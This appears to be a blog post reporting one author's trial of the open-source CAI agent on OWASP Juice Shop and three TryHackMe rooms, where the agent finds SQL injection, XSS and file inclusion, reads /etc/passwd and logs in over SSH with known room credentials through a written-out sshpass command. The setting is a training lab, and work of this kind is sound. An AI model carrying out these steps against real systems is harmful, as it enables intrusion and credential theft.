Pentest with AI agents, experiment with CAI

11:29
22.10.2025
InfoSec_razbor
11

Hello tekkix!

AI agents are being talked about everywhere right now, from articles to technical reports. But theory is one thing, and practice is another. That’s why I decided to run a small experiment, take the new CAI tool and see if it can handle popular training tasks in pentesting.

In this article, I’ll talk about my small test of the open-source project CAI (Cybersecurity AI) from Alias Robotics, announced on May 28, 2025.

AI agent analyzes network traffic as part of a pentest

In short, CAI is an open-source platform positioned as an AI assistant for discovering vulnerabilities and performing offensive (and defensive) security tasks. Onboard: multi-agent orchestration, an extensive toolkit, and support for local models.

Installation was almost trouble-free. Except I had to struggle a bit with proxy configuration (sanctions restrictions have their impact) and setting up OpenAI tokens — I had to top up $5 and use the gpt-3.5-turbo model, since it uses tokens much more economically compared to gpt-4o-mini.

To test its capabilities, I chose two scenarios: OWASP Juice Shop and several CTFs on TryHackMe.

On Juice Shop, I tested CAI on an application deliberately filled with vulnerabilities. The agent quickly scanned accessible pages, automatically found an SQL Injection in search parameters, and used it to bypass authentication, gaining access to the admin panel. It also pointed out XSS vulnerabilities in the feedback form and even suggested working payloads, and from the database it managed to extract user lists and passwords in plain text. The scenario wasn’t complex, and here CAI proved to be a handy assistant for web pentesting, taking over the routine search for SQLi and XSS.

Visualization of CAI operation in automatic vulnerability scanning

The next test was on TryHackMe, where I tried three CTFs: Offensive Security Intro, Basic Pentesting and Mr Robot CTF.

In Offensive Security Intro, the goal was to gain access to internal web application files and find hidden keys. CAI started with reconnaissance: scanned ports using nmap, discovered a web server on port 80 and an application called “Bank”. Then the agent spotted a parameter vulnerable to Local File Inclusion, and via injection was able to read the contents of /etc/passwd, then traverse /home/ and /var/www/html/. Everything went quite smoothly, and here CAI again completed the task fully autonomously, from detecting LFI to retrieving the required files.

Scheme of interaction between multiple AI agents during a penetration test

The next CTF was Basic Pentesting, where the goal was to gain system access via weak credentials.

CAI started with basic reconnaissance: ran ping and nmap -sV -A. The host was alive, Apache was running on port 80 (right on the main page there was a hint in an HTML comment: “Check our dev note section…”), on 139/445 - Samba, and port 8080 - Tomcat 9.0.7, plus AJP on 8009.

Read also:

SD-WAN and Migration Challenges: Merging Networks with Identical Address Space

Then I launched a set of commands in one script: checking common paths, directory bruteforcing, basic SMB enumeration.

CAI discovered /development/ and inside it dev.txt,

Pentest panel interface with integrated AI for hacking a test network

Checked Tomcat /manager/html (responded 401), and also gathered information on SMB without smbclient. At this stage, it highlighted two important hints: first, SMB is indeed configured and provides an opportunity for attack, and second, Struts 2.5.12 is mentioned, with Tomcat running on port 8080.

Graphs and metrics of AI agent efficiency in the CAI experiment

Then everything followed the “classic” path of this room, via SMB → users → password → SSH. First I pulled everything from /development/, then hints about users jan and kay appeared. In j.txt there was a direct indication of a weak password for J. In such scenarios, jan’s password is usually armando.

I tried connecting via SSH “ssh [email protected] (password: armando)”. Upon entering the password, CAI froze and stopped responding (even Ctrl+C didn’t help), so I had to restart. On the next run, I went with a more reliable method

sshpass -p "armando" ssh -o StrictHostKeyChecking=no [email protected] "whoami && id && hostname"

This way CAI immediately executed the command as jan, without manual input, and as a result I gained SSH access [email protected] ✅.

Network map created by artificial intelligence during an attack simulation

In this room, the next goal is to reach the second user kay and extract the final key.

Process of bypassing security systems by the AI agent in a controlled environment

For this, I used an RSA key. Here I encountered the problem that copying the key output to a file via nano inside CAI was a bad idea (it’s interactive and often freezes). The solution turned out to be simple — do everything non-interactively in one command (script). After that, the key was saved, I removed the passphrase (via ssh-keygen -p) and connected to kay.

The final key was extracted. Overall, this scenario can be well automated; password brute-forcing, SSH handling, and further use of keys can be easily integrated into CAI.

Moment when the AI detects a critical vulnerability in the test

The final challenge was the Mr Robot CTF, where the goal was to find three keys.

During reconnaissance, CAI found a WordPress site and managed to log in under the account elliot / ER28-0652. The first key was extracted directly through the web interface, and the agent handled this task without issues.

Teamwork of multiple AI agents in a cybersecurity lab

However, the second and third keys were located deeper, in the file system (/home/elliot/ and /root/), and retrieving them required a reverse shell and subsequent privilege escalation to root.

Here CAI was already powerless. After several attempts, it became clear that CAI cannot automatically upload a PHP reverse shell, start a listener, and escalate privileges to root. For such steps, a live pentester or integration with full exploitation frameworks is still needed.

This experience clearly demonstrated the limits of CAI’s capabilities. Such minimal tests, of course, do not allow definitive conclusions, but they provide a general understanding of what this product is and where it fits. Replacing tools like Burp Suite is out of the question for now. Nevertheless, CAI left a very intriguing impression; it is convenient as an “assistant” for reconnaissance and simple attacks, and I will definitely continue testing it, but for me personally it remains more of an experiment rather than a tool for permanent work.